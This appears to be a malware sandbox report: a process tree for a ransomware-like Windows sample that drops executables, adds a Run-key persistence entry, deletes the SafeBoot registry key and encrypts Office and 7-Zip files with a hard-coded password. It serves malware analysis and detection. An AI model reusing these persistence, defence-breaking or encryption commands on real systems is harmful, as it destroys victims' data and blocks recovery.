PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2608	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2672	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 1204	580	sys100s.exe_.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe
"C:\Users\Admin\AppData\Local\Temp\sys100s.exe_.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -i
  2⤵
  - Executes dropped EXE
  PID:1188
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -i
  2⤵
  - Executes dropped EXE
  PID:536
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2884
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2740
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2952
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2880
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2656
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2608
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2672
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1204
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -i
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -i
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2676
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2916
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1536
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1612
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2512
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1664
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1964
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:768
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2268
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1920
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -s
  2⤵
  - Executes dropped EXE
  PID:2396
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -s
  2⤵
  - Executes dropped EXE
  PID:1052
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:760
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:376
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -i
  2⤵
  - Executes dropped EXE
  PID:892
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -i
  2⤵
  - Executes dropped EXE
  PID:1804
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2452
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:828
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1572
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2624
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1612
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2592
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2912
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2316
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:292
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:768
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -s
  2⤵
  PID:1672
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -s
  2⤵
  PID:344
- C:\Windows\SysWOW64\dcomcnfgui.exe
  "C:\Windows\system32\dcomcnfgui.exe" -s
  2⤵
  PID:2464
- C:\Windows\SysWOW64\ucsvcsh.exe
  "C:\Windows\system32\ucsvcsh.exe" -s
  2⤵
  PID:2864

C:\Windows\SysWOW64\ucsvcsh.exe
C:\Windows\SysWOW64\ucsvcsh.exe
1⤵
- Executes dropped EXE
PID:1224

C:\Windows\SysWOW64\dcomcnfgui.exe
C:\Windows\SysWOW64\dcomcnfgui.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:2412
- C:\Windows\SysWOW64\REG.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\ProgramData\local\svchost.exe" /f
  2⤵
  - Adds Run key to start application
  PID:3064
- C:\Windows\SysWOW64\reg.exe
  reg delete HKLM\System\CurrentControlSet\Control\SafeBoot /f
  2⤵
  - Impair Defenses: Safe Mode Boot
  - Modifies registry key
  PID:1716
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1592
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2308
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1900
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2856
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3068
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2360
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2940
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2836
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2344
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1664
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2520
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2060
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1816
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1540
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1192
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\History.txt.aes" "C:\Program Files\7-Zip\History.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\af.txt.aes" "C:\Program Files\7-Zip\Lang\af.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\an.txt.aes" "C:\Program Files\7-Zip\Lang\an.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ar.txt.aes" "C:\Program Files\7-Zip\Lang\ar.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ast.txt.aes" "C:\Program Files\7-Zip\Lang\ast.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2104
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\az.txt.aes" "C:\Program Files\7-Zip\Lang\az.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2312
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ba.txt.aes" "C:\Program Files\7-Zip\Lang\ba.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2756
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\be.txt.aes" "C:\Program Files\7-Zip\Lang\be.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bg.txt.aes" "C:\Program Files\7-Zip\Lang\bg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bn.txt.aes" "C:\Program Files\7-Zip\Lang\bn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3068
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\br.txt.aes" "C:\Program Files\7-Zip\Lang\br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ca.txt.aes" "C:\Program Files\7-Zip\Lang\ca.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\co.txt.aes" "C:\Program Files\7-Zip\Lang\co.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cs.txt.aes" "C:\Program Files\7-Zip\Lang\cs.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1108
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cy.txt.aes" "C:\Program Files\7-Zip\Lang\cy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Executes dropped EXE
